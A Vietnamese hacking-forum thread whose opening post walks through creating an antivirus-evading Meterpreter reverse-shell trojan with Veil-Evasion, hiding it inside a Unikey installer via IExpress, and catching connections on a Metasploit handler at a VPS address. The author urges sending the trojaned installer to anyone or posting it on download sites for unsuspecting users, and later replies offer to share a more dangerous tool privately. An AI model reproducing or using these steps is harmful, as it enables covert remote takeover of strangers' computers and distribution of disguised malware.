Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Hackerstudent93

VIP Members
30/09/2013
38
340 bài viết
Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows
Lab hacker : Sử dụng tool Veil-Evasion trong kali linux tạo Trojan, sau đó đính kèm với một tập tin cài đặt .exe khác như Unikey, Ccleaner.... sử dụng Iexpress trong Windows, kết hợp với VPS đã cài sẵn Metasploit đế tấn công ngoài mạng Wan. :D

hack.png

Điều kiện:

-1. Máy ảo sử dụng OS kali linux có metasploit và Veil-Evasion

-2. VPS đã cài sẵn Metasploit

-3. Máy thật sử dụng OS windows đã có sẵn công cụ Iexpress

-4. Đối tượng tấn công: Tất cả hệ điều hành Windows như Xp, Windows 7, Windows 8, Windows Server 2003, Windows Server 2008

Đầu tiên: Ta vào OS Kali linux khởi động Veil-Evasion

- Tham khảo về Veil-Evasion và hướng dẫn cài đặt ở đây:

- Khai báo các thông số và thiết lập để chuẩn bị tấn công.

- cd /root/Desktop

- cd Veil-Evasion-master

- ls

- ./Veil-Evasion.py ( để khởi chạy Veil-Evasion )

- list ( liệt kê tất cả danh sách payloads mà Veil-Evasion có thể khai thác )

- use python/meterpreter/rev_tcp ( sử dụng phương thức meterpreter/rev_tcp để tấn công )

- set LHOST 14.0.21.24 ( địa chỉ IP của VPS)

- set LPORT 4444 ( port mà bạn lắng nghe )

- set compile_to_exe Y ( Biên dịch để thực thi một file )

- generate ( tạo ra payload )

- please enter the base name for output files: ( nhập tên con trojan mà bạn muốn Veil-Evasion biên dịch ra là gì ? )

- How would you like to create your payload executable? ( Bạn muốn tạo payload sẽ thực thi giống như thế nào ? )

1 - Pyinstaller ( default )

2 - Py2Exe

- ở đây tôi chọn mặc định, nhấn 1 và gõ Enter

- file thực thi đã được viết ở /root/veil-oupt/compiled/virus.exe giờ mình sẽ di chuyển nó ra ngoài Destop với lệnh sau mv /root/veil-oupt/compiled/virus.exe /root/Desktop, sau đó copy nó ra ngoài windows và đính kèm vào phần mềm gõ tiếng việt Unikey

- Lưu ý: để Veil-Evasion có thể hoạt động tốt và tránh bị phần mềm diệt virus" làm thịt " thì các bạn nhớ là update Veil-Evasion để có hiệu quả tốt nhất nhá :D, tỉ lệ thành công là tuyệt đối 100%, các bạn tạo virus ra thì upload nó lên https://www.virustotal.com/ để kiểm tra xem thằng nào " làm thịt " đước nhá

- Windows:

- Các bạn download Unikey về, sau đó đi đến Start vào gõ Iexpress

- Copy con trojan mà Veil-Evasion tạo ra sẵn ngoài Desktop nhé

- Tiếp theo thì các bạn nhìn Trong Video mình hướng dẫn.

-VPS

- VPS của mình có địa chỉ là 14.0.21.24

- VPS đã cài sẵn Metasploit http://www.rapid7.com/products/metasploit/download.jsp tải về ở đây.

- Sau khi cài đặt Metasploit thì khởi chạy nó lên vào gõ các lệnh sau:

- use exploit/windows/multi/handler

- set payload windows/meterpreter/reverse_tcp

- set lhost 14.0.21.24 ( địa chỉ của VPS )

- set lport 4444 ( port lắng nghe )

- exploit

- Tiếp theo là nghịch thôi, một khi đã dính khởi chạy Unikey rồi công việc còn lại là số phận của máy tính đó là do các bạn định đoạt, ở đây tôi không nhắc lại các lệnh trong Metasploit, các bạn tự tìm hiểu nha , bây giờ bạn có thể gởi cho bất kì một ai đó chạy phần mềm Unikey này, hoặc upload lên trang download nào đó để mọi người có thể tải về và sử dụng, khi phần mềm
Unikey được chạy thì cũng đồng nghĩa với việc chạy luôn con virus ở hệ thống mà người dùng bình thường không hề hay biết, nếu tinh ý thì có thể dùng các lệnh nestat -a, hay xem trong Task manager các bạn tự tìm hiểu nhá.
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Hi bác. Em cũng như bác thôi. Click vào đính kèm.. sao không thấy gì hết bác.
Không có Đính kèm. Nếu bạn theo đúng địa chỉ, xin hãy thông báo cho quản trị viên




 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Bài viết của em có chỗ nào không ổn ạ ?, nếu không được em xin phép được xóa bài :confused:, tránh làm " bẩn " mắt các bác, vì không thấy các bác bình luận :rolleyes:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Bài viết của bạn hơi khó theo dõi vì hình ảnh và text không đi kèm với nhau để minh họa cho các bước. Bạn nên edit lại cho người đọc tiện theo dõi.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Đã edit lại bài viết rất rõ ràng và chi tiết cho các bác, nếu các không thích nữa thì em cũng đành chịu thôi, mệt quá rồi :rolleyes:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Bác DDos hướng dẫn ảnh vào file ảnh như thế thì chưa chuẩn lắm :rolleyes:, vẫn có nhiều nhược điểm, lang thang trên mấy forum nước ngoài thì thấy nó có vài kĩ thuật nâng cao hơn, có thể gởi cả file .exe qua facbook, Tools này cực kỳ nguy hiểm nên em sẽ không public ở đây, cũng như đưa link trang cho các bác, tránh hiện tượng sử dụng vào mục đích xấu, chỉ dùng để nghiên cứu học tập, khi nào rảnh em sẽ lập chủ để mới để anh em cùng phân tích, nếu ai có nhu cầu thì em sẽ gởi riêng cho :) hjhj
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Bác nói rõ hơn về bước "Hack" đi :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

luffy;11920 đã viết:
Bác nói rõ hơn về bước "Hack" đi :D
Không thành vấn đề, sẽ sớm bổ sung bài viết cho anh em tham khảo, lúc này đang hơi bận học tiếng anh một tí :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

anh chị nào co file iso backtrack 5 gui em voi!em vao trang www.backtrack-linux.org/downloads nhưng không download được!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

nhatkymay;11961 đã viết:
anh chị nào co file iso backtrack 5 gui em voi!em vao trang www.backtrack-linux.org/downloads nhưng không download được!
Em nên dùng Kali linux đi nhá ^^
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

co link k bac ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Hack with Metasploit in VPS + Veil-Evasion on Kali linux + Iexpress in Windows

Hackerstudent93 quá nhiệt tình rồi. Cảm ơn bạn.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
iexpress kali linux metasploit veil-evasion vps windows
Bên trên